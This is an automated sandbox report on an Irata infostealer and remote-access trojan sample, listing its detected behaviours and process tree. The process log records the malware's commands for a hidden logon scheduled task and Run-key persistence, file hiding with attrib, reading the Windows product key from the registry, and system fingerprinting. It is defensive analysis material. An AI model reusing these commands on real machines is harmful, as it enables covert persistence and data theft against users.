Malware Analysis Report

2025-01-19 06:13

Sample ID 231220-kppzdsgcb3
Target Moyetu_bEtaa.exe
SHA256 f99869fda6a82fa11cd3265d8ddfcf0bdb0f185f1e20ac05a4a231e7852b0ad4
Tags
irata infostealer rat trojan persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f99869fda6a82fa11cd3265d8ddfcf0bdb0f185f1e20ac05a4a231e7852b0ad4

Threat Level: Known bad

The file Moyetu_bEtaa.exe was found to be: Known bad.

Malicious Activity Summary

irata infostealer rat trojan persistence

Irata

Irata payload

Drops startup file

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Detects videocard installed

Suspicious use of WriteProcessMemory

Collects information from the system

Uses Task Scheduler COM API

Views/modifies file attributes

Runs net.exe

Enumerates processes with tasklist

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-20 08:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2023-12-20 08:46

Reported

2023-12-20 08:51

Platform

win10v2004-20231215-en

Max time kernel

44s

Max time network

178s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe

"C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe"

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

C:\Windows\System32\Wbem\wmic.exe

wmic os get locale

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo wlan"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

"C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1632 --field-trial-handle=1696,16508229378409673461,12922471493039034483,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

"C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1960 --field-trial-handle=1696,16508229378409673461,12922471493039034483,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1156 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1156 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1156 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1156 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupYoJEgp /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe\" /F /rl highest"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupYoJEgp /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe /f"

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupYoJEgp /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe\" /F /rl highest

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupYoJEgp /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe /f

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetupYoJEgp /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe\"""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

